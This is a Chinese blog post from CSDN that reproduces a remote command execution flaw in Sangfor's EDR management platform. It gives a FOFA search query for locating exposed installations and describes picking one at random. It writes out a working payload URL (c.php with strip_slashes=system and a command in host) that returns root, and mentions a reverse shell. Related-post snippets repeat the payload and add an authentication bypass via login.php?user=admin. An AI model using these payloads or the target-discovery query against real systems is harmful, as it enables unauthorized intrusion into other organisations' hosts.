某信服EDR终端检测响应平台RCE漏洞

最新推荐文章于 2024-04-02 16:26:56 发布
最新推荐文章于 2024-04-02 16:26:56 发布
阅读量4.8k 收藏 4
点赞数 3
分类专栏: Web安全 文章标签: 深信服 EDR终端 RCE 0day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_allen/article/details/108070714
版权

前言:

这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下。

复现:

第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。
在这里插入图片描述

第二步:随缘点击进去一个来到主界面,也就是这个样子。
在这里插入图片描述

第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host

/tool/log/c.php?strip_slashes=system&host=id

直接root权限
在这里插入图片描述
反弹shell。
在这里插入图片描述

zhzhzh777
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
fofa搜索漏洞技巧
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-08 3336
fofa搜索漏洞技巧整理,主要有以下十个方面:搜索HTTP响应头中含有"thinkphp"关键词的网站和IP;加上标题带有后台的;加上时间,现在新网站有thinkphp日志泄露的有很多; 搜索html正文中含有"管理后台"关键词的网站和IP body="管理后台"等。 fofa搜索漏洞技巧整理1、搜索HTTP响应头中含有"thinkphp"关键词的网站和IP。 header="thinkphp" && country="CN"
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
漏洞危害:可执任意系统命令,影响版本:< 最新版本(3.2.21)前说到,不是把梭的 0day 都不叫 0day,所以我们可以对命令执、代码执等漏洞相关敏感函数
深信服行为感知命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4639
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。
RCE(远程命令执行)漏洞详解
最新发布
sev1n的博客
04-02 1502
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
深信服EDR
weixin_44508748的博客
11-24 1471
深信服EDR 任意用户登录 fofa语法: body="终端检测响应平台" title="终端检测响应平台" title="SANGFOR终端检测响应平台" payload: https://1.1.1.1/ui/login.php?user=admin EDR RCE poc https://x.x.x.x/tool/log/c.php?strip_slashes=system&host=id https://x.x.x.x/tool/log/c.php?strip_slashes=s
PHP危险函数及漏洞复现
Feng_Blue_的博客
09-29 706
危险函数 eval 语句: eval 会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马,列如: 但这里我们用Feng来进行中国菜刀连接。 连接成功之后如下 能直接对对方服务器进行任何控制, assert() assert()同样会将字符串当做PHP 代码来执行。 在网页中通过hackbar来操作,是可以执行系统命令,如下图 preg_replace() 这个函数的作用是对字符串进行正则匹配后替换,列如下图: preg_rep...
深信服 EDR终端检测响应平台RCE漏洞代码分析
shy的博客
08-18 7036
一觉醒来,听说护网蓝队捕获了一个深信服0day,待我看完这部局再分析一下。 EDR简介 终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 fofa语法 title="终端检测响应平台" 漏洞复现 https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 代码分析 将c.php文件拷贝到本地进行分析 $_REQUEST会将接入..
【HW2020漏洞回顾】深信服EDR两大漏洞
wuguojie888的博客
08-20 8994
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
渗透测试-获取系统FOFA关键字来刷洞
aming小老弟
04-20 2490
如何获取FOFA语法关键字 有时候新爆出来的漏洞,想拿poc去刷一波,但是却不知道怎么用fofa去搜索 H3C为例 存在漏洞的页面是这样的,我们发现无法右键查看源码(也可以F12), 所以这个时候我们可以根据一些页面上存在的特征去找关键字。 根据url里的关键字进行搜索: 例如上图url中存在/imc/login.jsf, 这个路径可能就是这个产品所特有的路径, 我们可以直接把路径复制了粘贴在fofa中搜索(不是特别精准): 根据网站关键字搜索: fofa是支持搜索网站body的,这就说明我们可以根据网
weblogic弱口令漏洞复现
懂进攻知防守
07-20 1279
本文记录weblogic弱口令拿下某网站实例,仅供教学参考,后果自负!
常见漏洞挖掘——弱口令(任意文件上传)
weixin_53884648的博客
04-24 1071
常见漏洞挖掘;弱口令进入到任意文件上传。
漏洞挖掘fofa+xray
09-25
fofa+xray批量刷洞脚本,非常有用,fofa+xray批量刷洞脚本敬请期待特别好,fofa+xray批量刷洞脚本
寻找sql注入的网站的方法(必看)
09-09
下面小编就为大家带来一篇寻找sql注入的网站的方法(必看)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
深信服EDR任意用户登录与命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4104
终端检测响应平台EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。
深信服EDR终端检测响应平台漏洞_2020HW
薄炙厚词的博客
08-21 1361
深信服edr 2020HW 0day 远程命令执行漏洞 远程代码执行漏洞 任意用户登陆漏洞 免密码登陆 Payload 使用浏览器访问 https://ip:prot/ui/login.php?user=任意字符 原文链接 远程命令执行 使用浏览器访问 https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami https://ip:prot/tool/log/c.php?strip_slashes=system&ho
pikachu靶场RCE漏洞
10-13
这是一个关于Pikachu靶场的RCE漏洞的问题。Pikachu靶场是一个用于渗透测试和漏洞研究的虚拟机,而RCE漏洞则是一种远程代码执行漏洞,攻击者可以利用该漏洞在受害者系统上执行任意代码。 针对这个问题,我建议您可以参考以下步骤来修复该漏洞: 1. 确认漏洞是否存在:可以通过手动或自动化的方式对系统进行扫描,以确认是否存在该漏洞。 2. 更新相关软件:如果发现存在漏洞,应及时更新相关软件版本,以修复漏洞。 3. 配置安全策略:可以通过配置安全策略来限制攻击者对系统的访问权限,从而减少漏洞被利用的风险。 4. 加强监控:可以通过加强监控来及时发现并阻止攻击行为,从而保护系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值